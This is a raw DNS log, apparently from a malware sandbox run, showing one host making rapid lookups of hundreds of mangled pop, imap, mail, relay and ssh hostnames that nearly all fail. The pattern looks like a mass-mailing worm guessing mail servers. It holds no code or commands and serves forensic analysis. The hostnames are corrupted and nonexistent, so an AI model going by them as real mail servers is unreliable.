Nov 30, 2023 11:22:42.142435074 CET	1.1.1.1	192.168.2.4	0x7fcc	Name error (3)	pop.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.150640965 CET	1.1.1.1	192.168.2.4	0x4331	Name error (3)	pop3.yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.152861118 CET	1.1.1.1	192.168.2.4	0x59e8	Name error (3)	imap.yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.157300949 CET	1.1.1.1	192.168.2.4	0x5f02	Name error (3)	pop.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.161571026 CET	1.1.1.1	192.168.2.4	0x2d8b	Name error (3)	ssh.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.161581993 CET	1.1.1.1	192.168.2.4	0x2d8b	Name error (3)	ssh.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.170655012 CET	1.1.1.1	192.168.2.4	0x867f	Server failure (2)	ssh.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.181252003 CET	1.1.1.1	192.168.2.4	0xeff7	Name error (3)	ssh.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.181301117 CET	1.1.1.1	192.168.2.4	0xcc0c	Name error (3)	pop.kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.194926023 CET	1.1.1.1	192.168.2.4	0x72b7	Name error (3)	pop.s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.195034981 CET	1.1.1.1	192.168.2.4	0xd318	Name error (3)	pop.7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.202084064 CET	1.1.1.1	192.168.2.4	0x4fea	Name error (3)	pop.loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.203574896 CET	1.1.1.1	192.168.2.4	0xbb81	Name error (3)	pop.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.204114914 CET	1.1.1.1	192.168.2.4	0x9d5f	Name error (3)	mailgate.a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.259968042 CET	1.1.1.1	192.168.2.4	0xaf3e	Name error (3)	mailgate.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.263292074 CET	1.1.1.1	192.168.2.4	0x26c0	Name error (3)	ssh.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.311433077 CET	1.1.1.1	192.168.2.4	0x9a2c	Server failure (2)	relay.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.325278044 CET	1.1.1.1	192.168.2.4	0x26c0	Name error (3)	ssh.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.329890013 CET	1.1.1.1	192.168.2.4	0x72d	Name error (3)	pop.cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.333125114 CET	1.1.1.1	192.168.2.4	0xc6a2	Name error (3)	pop.jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.337316990 CET	1.1.1.1	192.168.2.4	0x6195	Name error (3)	pop.qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.352479935 CET	1.1.1.1	192.168.2.4	0x1e43	Name error (3)	imap.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.358330965 CET	1.1.1.1	192.168.2.4	0x184c	Name error (3)	pop.wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.369316101 CET	1.1.1.1	192.168.2.4	0xe78d	Name error (3)	pop.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.384530067 CET	1.1.1.1	192.168.2.4	0xe78d	Name error (3)	pop.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.404067993 CET	1.1.1.1	192.168.2.4	0xf389	Name error (3)	imap.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.413034916 CET	1.1.1.1	192.168.2.4	0x9a2c	Server failure (2)	relay.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.416646957 CET	1.1.1.1	192.168.2.4	0x2008	Name error (3)	pop.daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.417337894 CET	1.1.1.1	192.168.2.4	0x513d	Name error (3)	pop.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.419972897 CET	1.1.1.1	192.168.2.4	0x464c	Name error (3)	pop3.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.421303034 CET	1.1.1.1	192.168.2.4	0x77c3	Name error (3)	pop.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.458501101 CET	1.1.1.1	192.168.2.4	0xd757	Name error (3)	pop.ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.563016891 CET	1.1.1.1	192.168.2.4	0xa5c9	Name error (3)	sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.565272093 CET	1.1.1.1	192.168.2.4	0x55a4	Name error (3)	pop.zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.595278025 CET	1.1.1.1	192.168.2.4	0x912e	Name error (3)	pop.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.596788883 CET	1.1.1.1	192.168.2.4	0x5ef	Name error (3)	pop3.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.606328011 CET	1.1.1.1	192.168.2.4	0xa029	Name error (3)	pop.yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.607063055 CET	1.1.1.1	192.168.2.4	0x9c57	Name error (3)	pop.yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.608100891 CET	1.1.1.1	192.168.2.4	0xced2	Name error (3)	pop.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.608477116 CET	1.1.1.1	192.168.2.4	0x4545	Name error (3)	pop.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.609265089 CET	1.1.1.1	192.168.2.4	0x51ea	Name error (3)	pop.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.625813007 CET	1.1.1.1	192.168.2.4	0x796b	Name error (3)	pop.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.642157078 CET	1.1.1.1	192.168.2.4	0x84fa	Name error (3)	pop.asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.655136108 CET	1.1.1.1	192.168.2.4	0xe7cc	Name error (3)	pop.tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.657949924 CET	1.1.1.1	192.168.2.4	0x7b42	Name error (3)	pop.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.689126015 CET	1.1.1.1	192.168.2.4	0xd8d5	Name error (3)	imap.yahpl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.765002966 CET	1.1.1.1	192.168.2.4	0xe6d2	Name error (3)	pop3.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.765461922 CET	1.1.1.1	192.168.2.4	0x4fdf	Name error (3)	pop.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.766858101 CET	1.1.1.1	192.168.2.4	0x43b5	Name error (3)	pop.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.782165051 CET	1.1.1.1	192.168.2.4	0x2caf	Name error (3)	pop.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.812882900 CET	1.1.1.1	192.168.2.4	0xd04	Name error (3)	pop.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.813309908 CET	1.1.1.1	192.168.2.4	0xad3	Name error (3)	pop.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.813518047 CET	1.1.1.1	192.168.2.4	0x6261	Name error (3)	pop.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.813534021 CET	1.1.1.1	192.168.2.4	0x5f33	Name error (3)	pop.e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.822637081 CET	1.1.1.1	192.168.2.4	0xf0f9	Name error (3)	pop.geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.822655916 CET	1.1.1.1	192.168.2.4	0x505a	Name error (3)	imap.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.824385881 CET	1.1.1.1	192.168.2.4	0xf29d	Name error (3)	pop.nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.833607912 CET	1.1.1.1	192.168.2.4	0xad71	Name error (3)	pop.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.846136093 CET	1.1.1.1	192.168.2.4	0xa268	Name error (3)	pop.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.846872091 CET	1.1.1.1	192.168.2.4	0xefb9	Name error (3)	relay.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.903281927 CET	1.1.1.1	192.168.2.4	0x3488	Name error (3)	pop.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.904201031 CET	1.1.1.1	192.168.2.4	0x7bae	Name error (3)	pop.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.906157017 CET	1.1.1.1	192.168.2.4	0xb620	Name error (3)	pop.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.907282114 CET	1.1.1.1	192.168.2.4	0xb4b1	Name error (3)	pop.pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.919445992 CET	1.1.1.1	192.168.2.4	0x9ee2	Name error (3)	pop.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.921072006 CET	1.1.1.1	192.168.2.4	0xaa35	Name error (3)	pop.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.922395945 CET	1.1.1.1	192.168.2.4	0x533a	Name error (3)	pop.yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.963272095 CET	1.1.1.1	192.168.2.4	0x52b2	Name error (3)	pop.ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.978724003 CET	1.1.1.1	192.168.2.4	0x7f29	Name error (3)	mailgate.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.980627060 CET	1.1.1.1	192.168.2.4	0x4409	Name error (3)	pop3.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.038670063 CET	1.1.1.1	192.168.2.4	0x616d	Name error (3)	imap.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.042764902 CET	1.1.1.1	192.168.2.4	0x683d	Name error (3)	pop.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.094726086 CET	1.1.1.1	192.168.2.4	0x9ee2	Name error (3)	pop.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.105153084 CET	1.1.1.1	192.168.2.4	0x9b28	Name error (3)	pop.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.105201960 CET	1.1.1.1	192.168.2.4	0x9b28	Name error (3)	pop.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.110153913 CET	1.1.1.1	192.168.2.4	0x9e3f	Name error (3)	pop.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.144804001 CET	1.1.1.1	192.168.2.4	0x369d	Server failure (2)	pop.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.144839048 CET	1.1.1.1	192.168.2.4	0x369d	Server failure (2)	pop.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.148060083 CET	1.1.1.1	192.168.2.4	0x9e3f	Name error (3)	pop.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.162841082 CET	1.1.1.1	192.168.2.4	0x683d	Name error (3)	pop.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.164191008 CET	1.1.1.1	192.168.2.4	0x616d	Name error (3)	imap.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.165813923 CET	1.1.1.1	192.168.2.4	0x6e52	Name error (3)	pop.a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.168776989 CET	1.1.1.1	192.168.2.4	0xbe9f	Name error (3)	mailgate.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.169070005 CET	1.1.1.1	192.168.2.4	0xd204	Name error (3)	relay.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.169375896 CET	1.1.1.1	192.168.2.4	0xa345	Name error (3)	pop.yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.169847965 CET	1.1.1.1	192.168.2.4	0xe60e	Name error (3)	pop.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.175740957 CET	1.1.1.1	192.168.2.4	0x45b1	Name error (3)	pop3.caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.176558018 CET	1.1.1.1	192.168.2.4	0x8d35	Name error (3)	mail.loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.180385113 CET	1.1.1.1	192.168.2.4	0x1c06	Name error (3)	mail.zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.185884953 CET	1.1.1.1	192.168.2.4	0x9f9a	Name error (3)	mailgate.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.187124968 CET	1.1.1.1	192.168.2.4	0xe45c	Name error (3)	pop3.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.191394091 CET	1.1.1.1	192.168.2.4	0x5190	Name error (3)	pop.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.197535038 CET	1.1.1.1	192.168.2.4	0x7ab6	Name error (3)	pop.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.257555962 CET	1.1.1.1	192.168.2.4	0xc67c	Name error (3)	pop.mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.263169050 CET	1.1.1.1	192.168.2.4	0xf1c5	Name error (3)	pop.klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.272105932 CET	1.1.1.1	192.168.2.4	0x9ad1	Name error (3)	mail.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.311614990 CET	1.1.1.1	192.168.2.4	0xa75d	Name error (3)	mail.caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.314450979 CET	1.1.1.1	192.168.2.4	0xa7c9	Name error (3)	pop.n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.316186905 CET	1.1.1.1	192.168.2.4	0x3ba8	Name error (3)	mail.yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.325934887 CET	1.1.1.1	192.168.2.4	0x7c8d	Name error (3)	imap.cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.326327085 CET	1.1.1.1	192.168.2.4	0x8a0c	Name error (3)	mail.yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.353980064 CET	1.1.1.1	192.168.2.4	0xc25b	Name error (3)	imap.jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.384481907 CET	1.1.1.1	192.168.2.4	0xa2cc	Name error (3)	pop.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.385426044 CET	1.1.1.1	192.168.2.4	0x53c5	Name error (3)	imap.yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.387244940 CET	1.1.1.1	192.168.2.4	0x5a0e	Name error (3)	mailgate.ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.388303995 CET	1.1.1.1	192.168.2.4	0x1487	Name error (3)	pop3.h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.388340950 CET	1.1.1.1	192.168.2.4	0x6d52	Name error (3)	pop3.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.402364969 CET	1.1.1.1	192.168.2.4	0xb155	Name error (3)	pop.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.591690063 CET	1.1.1.1	192.168.2.4	0x6b05	Name error (3)	mailgate.s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.604274035 CET	1.1.1.1	192.168.2.4	0x32c	Name error (3)	mail.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.608920097 CET	1.1.1.1	192.168.2.4	0xcc2c	Name error (3)	pop3.yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.612204075 CET	1.1.1.1	192.168.2.4	0xe987	Name error (3)	pop.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.617187023 CET	1.1.1.1	192.168.2.4	0xf2ec	Name error (3)	relay.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.617643118 CET	1.1.1.1	192.168.2.4	0xb224	Name error (3)	imap.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.617676020 CET	1.1.1.1	192.168.2.4	0x4e72	Name error (3)	imap.ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.619893074 CET	1.1.1.1	192.168.2.4	0xfbc6	Name error (3)	pop.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.619900942 CET	1.1.1.1	192.168.2.4	0xfbc6	Name error (3)	pop.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.636677980 CET	1.1.1.1	192.168.2.4	0xf50c	Name error (3)	imap.caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.811659098 CET	1.1.1.1	192.168.2.4	0xdbb9	Name error (3)	mail.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.819648981 CET	1.1.1.1	192.168.2.4	0x480f	Name error (3)	pop3.as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.819813013 CET	1.1.1.1	192.168.2.4	0xe4a1	Name error (3)	pop3.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.821075916 CET	1.1.1.1	192.168.2.4	0x1647	Name error (3)	imap.daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.831913948 CET	1.1.1.1	192.168.2.4	0x432e	Name error (3)	pop3.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.832570076 CET	1.1.1.1	192.168.2.4	0x9fb6	Name error (3)	pop3.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.836328983 CET	1.1.1.1	192.168.2.4	0x30a9	Name error (3)	imap.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.857270002 CET	1.1.1.1	192.168.2.4	0xf10d	Name error (3)	mailgate.yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.864238977 CET	1.1.1.1	192.168.2.4	0x259c	Name error (3)	imap.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.875407934 CET	1.1.1.1	192.168.2.4	0xefe9	Name error (3)	mail.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.881124020 CET	1.1.1.1	192.168.2.4	0xfcb5	Name error (3)	imap.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.882195950 CET	1.1.1.1	192.168.2.4	0x4756	Name error (3)	mail.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.882889032 CET	1.1.1.1	192.168.2.4	0x15b1	Name error (3)	pop3.hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.913014889 CET	1.1.1.1	192.168.2.4	0x8399	Server failure (2)	pop.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.011754036 CET	1.1.1.1	192.168.2.4	0x7b36	Name error (3)	pop3.s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.014952898 CET	1.1.1.1	192.168.2.4	0x3ac9	Name error (3)	pop3.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.018585920 CET	1.1.1.1	192.168.2.4	0x3d8c	Name error (3)	pop.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.023987055 CET	1.1.1.1	192.168.2.4	0xc10f	Name error (3)	imap.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.024534941 CET	1.1.1.1	192.168.2.4	0x2152	Name error (3)	imap.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.026797056 CET	1.1.1.1	192.168.2.4	0x4b63	Name error (3)	imap.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.037843943 CET	1.1.1.1	192.168.2.4	0x4a8f	Name error (3)	imap.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.070422888 CET	1.1.1.1	192.168.2.4	0x398f	Name error (3)	mailgate.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.075284958 CET	1.1.1.1	192.168.2.4	0x3d8c	Name error (3)	pop.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.076014996 CET	1.1.1.1	192.168.2.4	0x6f9e	Name error (3)	pop3.f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.088198900 CET	1.1.1.1	192.168.2.4	0x95d	Name error (3)	pop3.horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.096157074 CET	1.1.1.1	192.168.2.4	0x9d7a	Server failure (2)	imap.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.103384972 CET	1.1.1.1	192.168.2.4	0x9191	Name error (3)	pop3.7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.106040955 CET	1.1.1.1	192.168.2.4	0xcb69	Name error (3)	pop3.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.106259108 CET	1.1.1.1	192.168.2.4	0xbdff	Name error (3)	pop3.23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.108139992 CET	1.1.1.1	192.168.2.4	0xa44a	Name error (3)	pop3.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.112873077 CET	1.1.1.1	192.168.2.4	0x398f	Name error (3)	mailgate.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.118500948 CET	1.1.1.1	192.168.2.4	0x637	Name error (3)	imap.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.145095110 CET	1.1.1.1	192.168.2.4	0x64be	Name error (3)	mail.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.164901972 CET	1.1.1.1	192.168.2.4	0xaaf0	Name error (3)	imap.nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.169641018 CET	1.1.1.1	192.168.2.4	0x9d7a	Server failure (2)	imap.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.171109915 CET	1.1.1.1	192.168.2.4	0xa76	Name error (3)	pop3.fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.184674025 CET	1.1.1.1	192.168.2.4	0x29ee	Name error (3)	mailgate.ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.184884071 CET	1.1.1.1	192.168.2.4	0x54e9	Name error (3)	mail.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.186373949 CET	1.1.1.1	192.168.2.4	0x536	Name error (3)	imap.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.186429977 CET	1.1.1.1	192.168.2.4	0x1404	Name error (3)	imap.wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.187005997 CET	1.1.1.1	192.168.2.4	0xf286	Name error (3)	imap.yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.187894106 CET	1.1.1.1	192.168.2.4	0xdbad	Name error (3)	mail.fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.188301086 CET	1.1.1.1	192.168.2.4	0x2a08	Name error (3)	qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.188760042 CET	1.1.1.1	192.168.2.4	0xced5	Name error (3)	pop3.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.189436913 CET	1.1.1.1	192.168.2.4	0x2068	Name error (3)	mail.23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.191024065 CET	1.1.1.1	192.168.2.4	0x1030	Name error (3)	imap.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.223066092 CET	1.1.1.1	192.168.2.4	0x9191	Name error (3)	pop3.7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.225915909 CET	1.1.1.1	192.168.2.4	0xd841	Name error (3)	pop3.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.227057934 CET	1.1.1.1	192.168.2.4	0x71dd	Name error (3)	imap.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.251218081 CET	1.1.1.1	192.168.2.4	0xeedd	Name error (3)	pop3.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.265149117 CET	1.1.1.1	192.168.2.4	0x1030	Name error (3)	imap.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.268758059 CET	1.1.1.1	192.168.2.4	0x64be	Name error (3)	mail.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.268775940 CET	1.1.1.1	192.168.2.4	0xda92	Name error (3)	mailgate.yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.269279957 CET	1.1.1.1	192.168.2.4	0x6f5f	Name error (3)	pop3.kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
